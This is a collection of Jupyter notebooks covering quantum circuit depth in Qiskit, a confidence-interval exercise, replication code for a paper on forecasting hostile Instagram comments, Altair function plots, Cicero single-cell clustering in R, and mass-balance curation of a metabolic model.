stacking on top. # ## Dependence of Depth on Gate Selection <a name="gate_dependence"></a> # # We close by highlighting a very important point. The **depth** of a quantum circuit, and thus the ability to run said circuit on noisy quantum hardware depends on the choice of gates used to implement that circuit. The original circuit used in this tutorial had a depth of 9. qc.depth() # However, the SWAP gates used in the construction of that circuit are not native to the IBM Q devices. 
A decomposition that runs on the devices is a decomposition in terms of three CNOT gates: qc3 = QuantumCircuit(2) qc3.swap(0,1) qc3.decompose().draw() # This decomposes the swap gate into the gates we want # So the exact same circuit could be written as: # + qc4 = QuantumCircuit(12) for idx in range(5): qc4.h(idx) qc4.cx(idx, idx + 5) qc4.cx(1, 7) qc4.x(8) qc4.cx(1, 9) qc4.x(7) qc4.cx(1, 11) qc4.cx(6, 11) qc4.cx(11, 6) qc4.cx(6, 11) qc4.cx(6, 9) qc4.cx(9, 6) qc4.cx(6, 9) qc4.cx(6, 10) qc4.cx(10, 6) qc4.cx(6, 10) qc4.x(6) qc4.draw() # - # That has a depth approaching twice that of the original circuit qc4.depth() # This simple example is meant to illustrate a very important point: **When running circuits on actual quantum devices, the circuit that gets run is in general not the same circuit that you constructed**. In addition, the depth of that new circuit is likely to be larger, and in some cases much larger, than the original one. Fortunately, often times one can reduce this overhead through smart circuit rewriting toolchains. import qiskit.tools.jupyter # %qiskit_version_table # %qiskit_copyright
legacy_tutorials/terra/4_quantum_circuit_properties.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # 4.8 Twitter users and news # + import math """ Confidence Interval of 95% Function pe = the population point estimate std = standard deviation of the population sample_size = size of the sample """ #Standard error method that comes into computation def standard_error(std, sample_size): return (std/(math.sqrt(sample_size))) def ci_99(pe, se): z = 2.576 ci_minus = pe - (z * se) ci_plus = pe + (z * se) ci = (ci_minus,ci_plus) #returns a tuple return ci # - # **Given Data :** # <br/> # point estimate = 52%<br/> # Standard Error = 2.4% # Creating a 99 % confidence interval for the proportion of US adults Twitter users who get some news on Twitter. ci_99(52,2.4) # **<u>Inference : </u> : ** We are 99% confident that the proporion of U.S. adults using Twitter getting some news out of it falls between 45.8176, 58.1824
Chapter 4/Exercises/4.8_Twitter_News_1.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + [markdown] deletable=true editable=true # This notebook provides code to reproduce the primary figures and tables in the paper # # > <NAME>, <NAME>, <NAME>, and <NAME>. "Forecasting the presence and intensity of hostility on Instagram using linguistic and social features." In *Proceedings of the Twelfth International AAAI Conference on Web and Social Media (ICWSM'18)* # # # Note that while all data used was publicly available, in order to respect user privacy and Instagram's terms of service, we are unfortunately unable to share publicly the raw data needed to replicate the results in this notebook. # + deletable=true editable=true # Imports and setup. # %load_ext autoreload # %autoreload 2 from collections import Counter, defaultdict from itertools import chain, combinations, cycle from IPython.display import display import json import math import matplotlib.pyplot as plt import numpy as np import os import pandas as pd import random import re from sklearn.feature_extraction.text import CountVectorizer from sklearn.feature_selection import chi2 from sklearn.linear_model import LogisticRegression from sklearn.metrics import roc_auc_score import tarfile from urllib.request import urlretrieve path = 'data/' os.environ['NOBULL_PATH'] = path import u # %matplotlib inline u.config_matplotlib() # + deletable=true editable=true def download_data(path): """ Download any required files if not already present. 
""" url = 'https://www.dropbox.com/s/5lvcowbq9kqpvkc/data.tgz?dl=1' if not os.path.exists(path + os.path.sep + 'model.w2v'): zipname = 'data.tgz' print('fetching data (1.5G)') urlretrieve(url, zipname) tar = tarfile.open(zipname, "r:gz") print('extracting %s' % zipname) tar.extractall() tar.close() else: print('data already exists in %s' % path) download_data(path) # + [markdown] deletable=true editable=true # ## Task 1 # # Given first $N$ comments, predict whether a hostile comment will appear $K$ hours in the future or later. # + deletable=true editable=true # Read raw data. task1_posts = u.load_posts(path + 'task1_data.json', path + 'task1_labels.json') print('read %d posts' % len(task1_posts)) # + deletable=true editable=true def get_feature_indices(feature_names, feature_classes): print('%d feature classes, %d features' % (len(feature_classes), sum(len(f) for f in feature_names))) res = {} i = 0 for fc, fns in zip(feature_classes, feature_names): res[fc] = np.arange(i, i+len(fns)) i += len(fns) return res def concat_indices(feature_class2indices, classes): return np.concatenate([feature_class2indices[c] for c in classes]) def enum_feature_subsets(feature_class2indices): "powerset([1,2,3]) --> () (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)" s = list(feature_class2indices.keys()) return ((classes, concat_indices(feature_class2indices, classes)) for classes in chain.from_iterable(combinations(s, r) for r in range(1, len(s)+1))) def select_results(results, num_features, used_features): selected = [] for i, r in enumerate(results.iterrows()): if len(r[1]['features']) == num_features and len(used_features - set(r[1]['features'])) == 0: selected.append(i) return results.iloc[selected] def print_results_table(results): """ Print feature comparison table. 
""" res = select_results(results, 2, set(['Unigram'])) table = pd.concat([results[results.features==('Unigram',)], res.sort_values('AUC', ascending=True), results.sort_values('AUC', ascending=False).head(1)]) print('best features:', table.features.values[-1]) pd.options.display.max_colwidth = 100 names = [t[0] if len(t) == 1 else 'U + %s' % t[1] for t in table['features']] names[-1] = 'Best' table['features'] = names table = table[['features', 'AUC', 'F1', 'Precision', 'Recall']] table = table.set_index('features') display(table.iloc[0]) display(table) print(table.to_latex(bold_rows=True, float_format='%.3f', index=True)) def get_lines(): random.seed(42) markers = ['o', '^', 's', '*', 'D'] lines = ['-', '--', '-.', ':', '--'] colors = ['b', 'g', 'r', 'c', 'm', 'y', 'k'] for i in range(5): mi = list(markers) random.shuffle(mi) markers += mi li = list(lines) random.shuffle(li) lines += li ci = list(colors) random.shuffle(ci) colors += ci return cycle(['%s%s%s' % (c, m, l) for c, l, m in zip(colors, lines, markers)]) # + deletable=true editable=true def task1_expts(posts, lead_time=3, max_lead_time=10): """ Perform all experiments for Task 1 and generate Table 2. 
""" task1_sampled_posts = u.sample_posts_task1(posts, lead_time=max_lead_time*60*60) task1_sampled_posts = u.set_observed_comments(task1_sampled_posts, lead_time=lead_time*60*60) X, vec, feature_names, feature_classes = u.vectorize(task1_sampled_posts) feature_class2indices = get_feature_indices(feature_names, feature_classes) display(sorted([(fc, len(i)) for fc, i in feature_class2indices.items()], key=lambda x: x[1])) all_results = [] y = np.array([1 if p['num_hostile'] > 0 else 0 for p in task1_sampled_posts]) label_counts = Counter(y) print(label_counts) for feature_classes, col_indices in enum_feature_subsets(feature_class2indices): res = { 'features': feature_classes, 'n_instances': len(y), 'n_pos': label_counts[1], 'n_neg': label_counts[0]} XX = X[:,col_indices] # run cross-validation n_comments = np.array([p['n_comments_observed'] for p in task1_sampled_posts]) res.update(u.cv(XX, y, n_splits=10, n_comments=n_comments)) all_results.append(res) return pd.DataFrame(all_results), feature_class2indices task1_results, feature_class2indices = task1_expts(task1_posts, lead_time=3) print_results_table(task1_results) # + deletable=true editable=true # Create table of AUC vs lead time def task1_lead_time_fig(posts, lead_times, features): """ Produce Figure 3, hostility presence forecasting accuracy as lead time increases. 
""" # resample and vectorize according to each lead_time all_results = [] # to ensure comparability, we'll sample posts using longest lead times, then # reuse the for shorter lead times posts = u.sample_posts_task1(posts, lead_time=max(lead_times)*60*60) for lead_time in lead_times: task1_sampled_posts = u.set_observed_comments(posts, lead_time=lead_time*60*60) X, vec, feature_names, feature_classes = u.vectorize(task1_sampled_posts) feature_class2indices = get_feature_indices(feature_names, feature_classes) y = np.array([1 if p['num_hostile'] > 0 else 0 for p in task1_sampled_posts]) label_counts = Counter(y) n_comments = np.array([p['n_comments_observed'] for p in task1_sampled_posts]) for feature_list in features: col_indices = concat_indices(feature_class2indices, feature_list) XX = X[:, col_indices] res = { 'features': feature_list, 'lead_time': lead_time, 'n_instances': len(y), 'n_pos': label_counts[1], 'n_neg': label_counts[0]} # run cross-validation res.update(u.cv(XX, y, n_splits=10, n_comments=n_comments)) all_results.append(res) results_df = pd.DataFrame(all_results) plot_task1_lead_time_fig(results_df) return results_df def plot_task1_lead_time_fig(task1_res_fig, nfolds=10): plt.figure() linecycler = get_lines() for fnames in sorted([x for x in set(task1_res_fig.features)], key=lambda x: -len(x)): df = task1_res_fig[task1_res_fig.features==fnames] rr = df.sort_values('lead_time')[['lead_time', 'AUC', 'AUC_sd']].values xvals = rr[:,0] yvals = rr[:,1] stderrs = rr[:,2] / math.sqrt(nfolds) # standard error marker = next(linecycler) plt.plot(xvals, yvals, marker, label='+'.join(fnames)) plt.errorbar(xvals, yvals, fmt=marker, yerr=stderrs) plt.xlabel('lead time (hours)') plt.ylabel('AUC') plt.legend(loc='lower left') plt.setp(plt.legend().get_texts(), fontsize='12') plt.ylim((.73, .855)) plt.tight_layout() plt.savefig('forecast_time.pdf') plt.show() task1_lead_time_results = task1_lead_time_fig(task1_posts, lead_times=[1, 3, 5, 8, 10], features=[('Unigram', 
'lex'), ('Unigram', 'lex', 'w2v'), ('Unigram', 'lex', 'n-w2v'), ('Unigram', 'lex', 'n-w2v', 'prev-post', 'trend'), ] ) # + deletable=true editable=true def task1_n_comments_fig(posts, features, lead_time=3): """ Produce Figure 4, hostility presence forecasting AUC as the number of observed comments increases. """ task1_sampled_posts = u.sample_posts_task1(posts, lead_time=lead_time*60*60) X, vec, feature_names, feature_classes = u.vectorize(task1_sampled_posts) feature_class2indices = get_feature_indices(feature_names, feature_classes) y = np.array([1 if p['num_hostile'] > 0 else 0 for p in task1_sampled_posts]) label_counts = Counter(y) all_results = [] n_comments = np.array([p['n_comments_observed'] for p in task1_sampled_posts]) for feature_list in features: col_indices = concat_indices(feature_class2indices, feature_list) XX = X[:, col_indices] res = { 'features': feature_list, 'lead_time': lead_time, 'n_instances': len(y), 'n_pos': label_counts[1], 'n_neg': label_counts[0]} res.update(u.cv(XX, y, n_splits=10, n_comments=n_comments)) all_results.append(res) df = pd.DataFrame(all_results) plot_task1_n_comments_fig(df) return df def plot_task1_n_comments_fig(df): bins = {'1': [1], '2': [2], '3': [3], '4-6': [4,5,6], '7-9': [7,8,9], '>=10': range(10,500) } plt.figure() linecycler = get_lines() for features, by_n_comments in df[['features', 'by_n_comments']][::-1].values: # group results by number of comments nc2res = defaultdict(list) for x in by_n_comments: nc2res[x[2]].append((x[0], x[1])) rocs = [] for label, ncs in sorted(bins.items()): res = [] for nc in ncs: res.extend(nc2res[nc]) rocs.append(roc_auc_score([v[0] for v in res], [v[1] for v in res], average=None)) plt.plot(rocs, next(linecycler), label='+'.join(features)) plt.xticks(range(len(bins)), sorted(bins)) plt.legend(loc='lower right') plt.xlabel('number of observed comments') plt.ylabel('AUC') plt.ylim((.4, 1)) plt.setp(plt.legend().get_texts(), fontsize='12') plt.savefig('forecast_comments.pdf') 
plt.show() n_comments_res = task1_n_comments_fig(task1_posts, features=[('Unigram', 'lex'), ('Unigram', 'lex', 'w2v'), ('Unigram', 'lex', 'n-w2v'), ('Unigram', 'lex', 'n-w2v', 'prev-post', 'trend'), ], lead_time=3) # + deletable=true editable=true """ Print the top features per class according to the logistic regression coefficients, including the top terms in each word2vec dimension. """ def load_predicted_vectors(words, w2v=u.w2v_model_3gram, dim=100): vecs = [] for wd in words: vecs.append(u.get_vector(wd, w2v, dim)) return np.array(vecs) def get_top_w2v_words(words, word_vecs, idx, n=20): return words[word_vecs[:,idx].argsort()[::-1][:n]] def get_top_features_task1(task1_posts, lead_time=3, nfeats=40, features=('Unigram', 'user', 'trend', 'lex', 'n-w2v', 'final-com', 'prev-post')): task1_sampled_posts = u.sample_posts_task1(task1_posts, lead_time=3*60*60) X, vec, feature_names, feature_classes = u.vectorize(task1_sampled_posts) feature_class2indices = get_feature_indices(feature_names, feature_classes) y = np.array([1 if p['num_hostile'] > 0 else 0 for p in task1_sampled_posts]) col_indices = concat_indices(feature_class2indices, features) XX = X[:,col_indices] clf = LogisticRegression(class_weight='balanced') clf.fit(XX, y) fnames = np.concatenate(feature_names) fnames = fnames[col_indices] words = np.array(feature_names[feature_classes.index('Unigram')]) word_vecs = load_predicted_vectors(words) results = [] for i in np.argsort(clf.coef_[0])[::-1][:nfeats]: res = {'feature': fnames[i], 'coef': clf.coef_[0][i]} if 'neww2v' in fnames[i]: idx = int(re.findall('_([0-9]+)\-', fnames[i])[0]) res['w2v'] = ' '.join(get_top_w2v_words(words, word_vecs, idx)) results.append(res) results = pd.DataFrame(results) display(results) return results # + deletable=true editable=true get_top_features_task1(task1_posts) # + [markdown] deletable=true editable=true # ## Task 2 # # Given the first $N$ comments up to and including the first hostile comment, predict whether there will 
be less than $M$ or more than $Q$ hostile comments total. # + deletable=true editable=true task2_posts = u.load_posts(path + 'task2_data.json', path + 'task2_labels.json') u.set_n_comments_observed_task2(task2_posts) print('read %d posts' % len(task2_posts)) # + deletable=true editable=true # Vectorize X, vec, feature_names, feature_classes = u.vectorize(task2_posts) X.shape # + deletable=true editable=true feature_class2indices = get_feature_indices(feature_names, feature_classes) sorted([(fc, len(i)) for fc, i in feature_class2indices.items()], key=lambda x: x[1]) # + deletable=true editable=true def task2_expts(posts, X, vec, feature_class2indices, max_for_neg_class=1, min_for_pos_class=10): """ Perform task 2 experiments and produce Table 3, forecasting AUC with N=10 """ all_results = [] idx = u.filter_by_num_hostile(posts, max_for_neg_class=max_for_neg_class, min_for_pos_class=min_for_pos_class) Xi = X[idx] postsi = posts[idx] y = np.array([1 if p['num_hostile'] >= min_for_pos_class else 0 for p in postsi]) label_counts = Counter(y) for feature_classes, col_indices in enum_feature_subsets(feature_class2indices): res = { 'features': feature_classes, 'max_for_neg_class': max_for_neg_class, 'min_for_pos_class': min_for_pos_class, 'n_instances': len(idx), 'n_pos': label_counts[1], 'n_neg': label_counts[0]} XX = Xi[:,col_indices] # run cross-validation res.update(u.cv(XX, y, n_splits=10)) all_results.append(res) return pd.DataFrame(all_results) task2_results = task2_expts(task2_posts, X, vec, feature_class2indices) print_results_table(task2_results) # + deletable=true editable=true """ Produce Figure 5, hostility intensity forecasting AUC as the positive class threshold increases. 
""" def task2_min_for_pos_class_fig(task2_results, posts, X, vec, feature_class2indices, features, max_for_neg_class=1, min_for_pos_class_list=range(5,11)): col_indices = concat_indices(feature_class2indices, features) X = X[:,col_indices] all_results = [] for min_for_pos_class in min_for_pos_class_list: idx = u.filter_by_num_hostile(posts, max_for_neg_class=max_for_neg_class, min_for_pos_class=min_for_pos_class) Xi = X[idx] postsi = posts[idx] y = np.array([1 if p['num_hostile'] >= min_for_pos_class else 0 for p in postsi]) label_counts = Counter(y) res = { 'features': feature_classes, 'max_for_neg_class': max_for_neg_class, 'min_for_pos_class': min_for_pos_class, 'n_instances': len(idx), 'n_pos': label_counts[1], 'n_neg': label_counts[0]} # run cross-validation res.update(u.cv(Xi, y, n_splits=10)) all_results.append(res) results_df = pd.DataFrame(all_results) plot_task2_fig(results_df) return results_df def plot_task2_fig(task2_res_fig, nfolds=10): rr = task2_res_fig.sort_values('min_for_pos_class')[['min_for_pos_class', 'AUC', 'AUC_sd']].values xvals = rr[:,0] yvals = rr[:,1] stderrs = rr[:,2] / math.sqrt(nfolds) ## assuming 10-fold cv plt.figure() plt.plot(xvals, yvals, 'bo-') plt.errorbar(xvals, yvals, fmt='b', yerr=stderrs) plt.xlabel('minimum number of hostile comments\nin positive class') plt.ylabel('AUC') plt.tight_layout() plt.savefig('intensity_threshold.pdf') plt.show() task2_pos_class_res = task2_min_for_pos_class_fig(task2_results, task2_posts, X, vec, feature_class2indices, features=('Unigram', 'lex', 'n-w2v', 'prev-post', 'trend', 'user', 'final-com'), max_for_neg_class=1, min_for_pos_class_list=range(5,16)) # + deletable=true editable=true """ Print the top features for task 2 according to the logistic regression coefficients. 
""" def get_top_features_task2(task2_posts, X, vec, feature_class2indices, feature_names, feature_classes, features=('Unigram', 'user', 'trend', 'lex', 'n-w2v', 'final-com', 'prev-post'), min_for_pos_class=10, max_for_neg_class=1, nfeats=40): idx = u.filter_by_num_hostile(task2_posts, max_for_neg_class=max_for_neg_class, min_for_pos_class=min_for_pos_class) Xi = X[idx] postsi = task2_posts[idx] y = np.array([1 if p['num_hostile'] >= min_for_pos_class else 0 for p in postsi]) col_indices = concat_indices(feature_class2indices, features) XX = Xi[:,col_indices] clf = LogisticRegression(class_weight='balanced') clf.fit(XX, y) fnames = np.concatenate(feature_names) fnames = fnames[col_indices] words = np.array(feature_names[feature_classes.index('Unigram')]) word_vecs = load_predicted_vectors(words) results = [] for i in np.argsort(clf.coef_[0])[::-1][:nfeats]: res = {'feature': fnames[i], 'coef': clf.coef_[0][i]} if 'neww2v' in fnames[i]: idx = int(re.findall('_([0-9]+)\-', fnames[i])[0]) res['w2v'] = ' '.join(get_top_w2v_words(words, word_vecs, idx)) results.append(res) results = pd.DataFrame(results) return results get_top_features_task2(task2_posts, X, vec, feature_class2indices, feature_names, feature_classes, features=('Unigram', 'user', 'trend', 'lex', 'n-w2v', 'final-com', 'prev-post'), min_for_pos_class=10, max_for_neg_class=1) # + deletable=true editable=true """ Print top terms for task1 and task2 according to chi-squared. 
""" def top_hostile_terms(task1_posts, min_for_pos_class=10): comments_task1 = [] comments_task2 = [] labels_task1 = [] labels_task2 = [] for p in task1_posts: task2_label = 1 if p['num_hostile'] >= min_for_pos_class else 0 for c,l in zip(p['comments'], p['labels']): labels_task1.append(0 if l=='Innocuous' else 1) text = u.cleanText(c) comments_task1.append(text) if labels_task1[-1] == 1: comments_task2.append(text) labels_task2.append(task2_label) vec = CountVectorizer(min_df=5, binary=True) X1 = vec.fit_transform(comments_task1) y1 = np.array(labels_task1) feats1 = np.array(vec.get_feature_names()) X2 = vec.fit_transform(comments_task2) y2 = np.array(labels_task2) feats2 = np.array(vec.get_feature_names()) def top_coef(X, y, feats, n=50): chi, _ = chi2(X, y) pos_counts = X[np.where(y==1)].sum(axis=0).A1 neg_counts = X[np.where(y==0)].sum(axis=0).A1 clf = LogisticRegression() clf.fit(X,y) coef = clf.coef_[0] for i in np.argsort(chi)[::-1][:n]: if coef[i] > 0: print(chi[i], pos_counts[i], neg_counts[i], feats[i]) print('top terms predictive of hostile vs. non-hostile comment') top_coef(X1, y1, feats1, n=50) print('\n\n\ntop terms predictive of intense vs. non-intense hostility') top_coef(X2, y2, feats2, n=50) top_hostile_terms(task1_posts, min_for_pos_class=10)
Replication.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Graphing mathematical functions with Altair # [Altair][1] is a python graphing package by <NAME>. Let's give it a try. # # [1]: https://altair-viz.github.io/index.html import altair as alt import pandas as pd import numpy as np # ## Line x = np.arange(-10, 11, 1) y = 2 * x + 3 y source = pd.DataFrame({ 'x': x, 'y': y }) source alt.Chart(source).mark_line(point=True, clip=True).encode( alt.X('x', scale=alt.Scale(domain=(-20, 20)) ), y='y' ) # ## Parabola x = np.arange(-10, 11, 1) y = x**2 source = pd.DataFrame({ 'x': x, 'y': y }) alt.Chart(source).mark_line(point=True).encode( x=alt.X('x'), y='y' ) # ## Square root x = np.arange(0, 26, 0.1) y = np.sqrt(x) source = pd.DataFrame({ 'x': x, 'y': y }) a = alt.Chart(source).mark_line(point=True).encode( x=alt.X('x'), y='y' ) a.properties(height=500, width=700) # ## Circle # + r = 10 i = 0.1 x1 = np.arange(-10, 10.1, i) x2 = np.arange(10, -10.1, -i) y1 = np.sqrt(r**2 - x1**2) y2 = -np.sqrt(r**2 - x2**2) x = np.concatenate((x1, x2)) y = np.concatenate((y1, y2)) # - source = pd.DataFrame({ 'x': x, 'y': y }) source a = alt.Chart(source).mark_line(point=True).encode( alt.X('x', scale=alt.Scale(domain=(-12, 12)), sort=[False], ), alt.Y('y', scale=alt.Scale(domain=(-12, 12)), ), ) a.properties(height=500, width=520)
notebooks/graphing.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .r # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: R [conda env:ATACseq_Cicero] # language: R # name: conda-env-ATACseq_Cicero-r # --- # ### Installation # + # if (!requireNamespace("BiocManager", quietly = TRUE)) # install.packages("BiocManager") # BiocManager::install("cicero") # - # Vignette: https://www.bioconductor.org/packages/devel/bioc/vignettes/cicero/inst/doc/website.html # ### Import packages library(cicero) library(data.table) library(Matrix) library(proxy) library(reshape2) library(BuenColors) library(umap) # ### Load Data load('../../run_methods/Cicero/Cicero_10xpbmc5k.RData') # ### Cluster cells dim(datafr) dim(fm_Cicero) fm_Cicero[1:5,1:5] pd <- new("AnnotatedDataFrame", data = data.frame(label=metadata[colnames(fm_Cicero),'label'],row.names =colnames(fm_Cicero))) fd <- new("AnnotatedDataFrame", data = data.frame(row.names =rownames(fm_Cicero))) cds <- newCellDataSet(fm_Cicero, phenoData = pd, featureData = fd, expressionFamily = tobit()) cds <- detectGenes(cds) cds <- estimateSizeFactors(cds) # cds <- estimateDispersions(cds) cds <- reduceDimension(cds, max_components = 2, num_dim = 15,reduction_method = 'tSNE', verbose = T) cds <- clusterCells(cds,num_clusters = length(unique(metadata$label)),method = 'densityPeak') plot_cell_clusters(cds, 1, 2, color = "label") plot_cell_clusters(cds, 1, 2, color = "Cluster") df_out = data.frame(Cicero = cds$Cluster, row.names = sampleNames(phenoData(cds))) all(rownames(df_out) == rownames(metadata)) head(df_out) write.table(df_out, file='clusteringSolution.tsv', quote=FALSE, sep='\t', col.names = NA)
Real_Data/10x_PBMC_5k/extra_clustering/Cicero/Cicero_10xpbmc5k.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# # Introduction
# In notebook '12. Manual curation mass balances.ipynb' I fixed the mass balance of many of
# the reactions assigned to me. After a meeting with Ben and Martyn, I've gained input on
# how to fix the remaining mass-imbalanced reactions from my list. This notebook covers
# fixing those with the approximate approaches that were recommended.

import cameo
import pandas as pd
import cobra.io
import escher
from cobra import Model, Reaction, Metabolite

# E. coli models for comparison where necessary.
model_e_coli = cameo.load_model("iML1515")
model_e_coli_MG1655 = cameo.load_model("iJO1366")

model = cobra.io.read_sbml_model('../../model/p-thermo.xml')

# ahdt_c: set formula/charge and rebalance AHETDYTTPHY with one proton.
model.metabolites.ahdt_c.formula = 'C9H12N5O13P3'
model.metabolites.ahdt_c.charge = -4
model.reactions.AHETDYTTPHY.add_metabolites({model.metabolites.h_c:-1})

model.metabolites.arbt6p_c.name = 'Arbutin 6-phosphate'
# BUG FIX: the original read `...notes['NOTES']:'...'` — a ':' annotation statement that
# stores nothing — instead of an assignment, so the note was never written. (Compare the
# correct `notes['KEGG'] = ...` used later in this notebook.)
model.reactions.ARBTPT.notes['NOTES'] = 'Phosphate group donor mimicked here'
model.reactions.ARBTPT.add_metabolites({model.metabolites.pi_c:-1, model.metabolites.h2o_c: 1})
model.metabolites.arbt6p_c.formula = 'C12H15O10P'
model.metabolites.arbt6p_c.charge = -2

model.metabolites.glutrna_c.formula = 'C5H7NO3R'
# Need to add the tRNA(Glu) carrier metabolite ('R' = generic residue).
model.add_metabolites(Metabolite(id = 'trnaglu_c'))
model.metabolites.trnaglu_c.name = 'TRNA (Glu)'
model.metabolites.trnaglu_c.formula = 'R'
model.metabolites.trnaglu_c.charge = 0
model.metabolites.trnaglu_c.compartment = 'c'
model.metabolites.trnaglu_c.annotation = model_e_coli.metabolites.trnaglu_c.annotation
model.reactions.GLUTRS.add_metabolites({model.metabolites.trnaglu_c:-1})
model.reactions.GLUTRR.add_metabolites({model.metabolites.trnaglu_c:1})

model.metabolites.nh4_c.name = 'Ammonium'
model.metabolites.nh4_e.name = 'Ammonium'

# To tackle the reactions involving cellulose, we need a new way to represent its
# hydrolysis that keeps mass balance and a working model.
#
# cellulose_c is involved in two reactions:
# - BGLUCH: cellulose hydrolysis to beta-D-glucose + cellulose
# - CELLOHYDRO: hydrolysis of cellulose to cellobiose + cellulose
#
# We therefore represent cellulose as two single units instead of a long-chain polymer.
# This keeps mass balance and model function, but should be kept in mind when modelling
# growth of the organism on cellulose.
model.metabolites.cellb_c.name = 'Cellobiose'
model.metabolites.cellulose_c.formula = 'C12H20O10'
model.reactions.CELLOHYDRO.add_metabolites({model.metabolites.cellulose_c:-11})
model.reactions.BGLUCH.add_metabolites({model.metabolites.cellulose_c:10, model.metabolites.glc__bD_c:1, model.metabolites.h2o_c:-1})

# For reaction UAAAGGLAAT change the chemical formula of gmagg_c to reflect only the group
# it donates (similar to the cellulose treatment) instead of a polymer. gmagg_c occurs
# only in this reaction, so this should be safe.
model.metabolites.gmagg_c.formula = 'C39H64N8O19'
model.metabolites.gmagg_e.formula = 'C39H64N8O19'
model.reactions.UAAAGGLAAT.add_metabolites({model.metabolites.h_c:-1})

# Here add a phosphate donor group, and fix the acmum formulas/charges.
model.reactions.ACMUMPT.add_metabolites({model.metabolites.pi_c:-1, model.metabolites.h2o_c:1.0})
model.metabolites.acmum6p_c.formula = 'C11H17NO11P'
model.metabolites.acmum_c.formula = 'C11H18NO8'
model.metabolites.acmum_e.formula = 'C11H18NO8'
model.metabolites.acmum_c.charge = -1
model.metabolites.acmum6p_c.charge = -3

# For rct BTN5AMPL, I will get rid of the enzyme that catalyses the reaction here. So the
# reaction appears to have a free AMP bound to free biotin, which is a mimic of the true
# reaction.
# This is because the enzyme-bound biotin is currently not in the model, and I don't want
# to create new dead-end and orphan metabolites, as these will not run unless they are fixed.
model.metabolites.btn_c.name = 'Biotin'
model.reactions.BTN5AMPL.add_metabolites({model.metabolites.btn_c:1.0, model.metabolites.coa_c:1.0, model.metabolites.ACP_c:-1, model.metabolites.h2o_c:-1, model.metabolites.h_c:2})
model.metabolites.b5amp_c.formula = 'C20H27N7O9PS'
model.metabolites.b5amp_c.charge = -1
model.metabolites.btn_c.formula = 'C10H15N2O3S'
model.metabolites.btn_c.charge = -1

# For reactions ACCOAACT and ACCOATT we need to add an extra metabolite:
# 1-Acyl-sn-glycerol-3-phosphate ('R' in the formula is the acyl residue).
model.add_metabolites(Metabolite(id = 'aglyc3p_c'))
model.metabolites.aglyc3p_c.name = '1-Acyl-sn-glycerol 3-phosphate'
model.metabolites.aglyc3p_c.formula = 'C4H7O7PR'
model.metabolites.aglyc3p_c.charge = -2
model.metabolites.aglyc3p_c.compartment = 'c'
model.metabolites.aglyc3p_c.notes['KEGG'] = 'C00681'
model.reactions.ACCOAACT.add_metabolites({model.metabolites.aglyc3p_c:1.0})
model.metabolites.acoa_c.charge = -4
model.metabolites.acoa_c.formula = 'C22H32N7O17P3SR'
model.reactions.ACCOATT.add_metabolites({model.metabolites.aglyc3p_c:-1})
model.metabolites.pa_EC_c.formula = 'C5H7O8PR2'

# The ACEDIA reaction has an undefined electron (acceptor); balanced here with hacc_c.
model.reactions.ACEDIA.add_metabolites({model.metabolites.hacc_c:2})

# Save & commit, then reload from disk.
cobra.io.write_sbml_model(model,'../../model/p-thermo.xml')

model = cobra.io.read_sbml_model('../../model/p-thermo.xml')

# SELMELIG: this is a dead-end reaction anyway, so it can be removed.
rct = model.reactions.SELMELIG
model.remove_reactions(rct)

# Save & commit.
cobra.io.write_sbml_model(model,'../../model/p-thermo.xml')

# The SAM reaction should also be removed: it is just the donor reaction, with no methyl
# acceptor accompanying it. There are many other reactions involving the same metabolites
# where a proper acceptor is associated; those should remain.
rct_remove = model.reactions.SAM
model.remove_reactions(rct_remove)

cobra.io.write_sbml_model(model,'../../model/p-thermo.xml')

model = cobra.io.read_sbml_model('../../model/p-thermo.xml')

# __Modify the ACEDIA reaction.__
# This reaction contains an undefined electron acceptor and is non-enzymatic, so no
# cofactor data exists: it is predicted to be accepted by NAD, NADP, quinone or flavin,
# which makes it difficult to incorporate. In the Bacillus subtilis iYO844 model the
# reaction is ACLDC: alac__S_c + h_c --> actn__R_c + co2_c, i.e. the electrons are
# ignored. Proposal: add a metabolite for the electron formed here, then add reactions
# that consume it to generate NADPH, NADH, ferredoxin or quinone, and let the model's
# stoichiometry dictate which cofactor is used.
#
# __Duplicate metabolites__
# actn_c vs actn__R_c, and alac__S_b_c vs alac__S_c, are duplicates. These should be
# merged, after which the involved reactions can be sorted out.

# Remove PYRACTT and PYRACT: they are both the same as ACLS.
# (Should be irreversible, as our bug doesn't assimilate CO2.)
model.remove_reactions(model.reactions.PYRACTT)
model.remove_reactions(model.reactions.PYRACT)
# Remove ALACPH, it is the same as APLh.
model.remove_reactions(model.reactions.ALACPH)
# Remove DHMBISO, same as DMORh.
# Directionality: should be irreversible considering NADPH is involved.
model.reactions.DMORh.id = 'DMOR'
model.reactions.DMOR.bounds = (-1000,0)
model.remove_reactions(model.reactions.DHMBISO)
# Remove duplicate alac__S_b_c.
model.remove_metabolites(model.metabolites.alac__S_b_c)
model.reactions.APLh.id = 'APL'
# Remove dhmb metabolite; remove DHMBHL, same as DHAD1.
model.remove_reactions(model.reactions.DHMBHL)
model.remove_metabolites(model.metabolites.dhmb_c)
# Rename ACTNAT -> ACTD2.
model.reactions.ACTNAT.id = 'ACTD2'
# Merge actn_c into actn__R_c: swap one unit of actn_c for actn__R_c in ACTD2's
# stoichiometry so the duplicate acetoin species can be retired.
model.reactions.ACTD2.add_metabolites({model.metabolites.actn__R_c:-1, model.metabolites.actn_c:1})
# Rename rr23bdo_c -> btd_RR.
model.metabolites.rr23bdo_c.id = 'btd_RR'
# Rename B23DONOR -> BTDD_RR.
model.reactions.B23DONOR.id = 'BTDD_RR'

# Cross-check against B. subtilis iYO844 (inspection only; bare expressions just display
# in the notebook and do not modify our model).
bacillus = cameo.load_model('iYO844')

bacillus.metabolites.actn__R_c

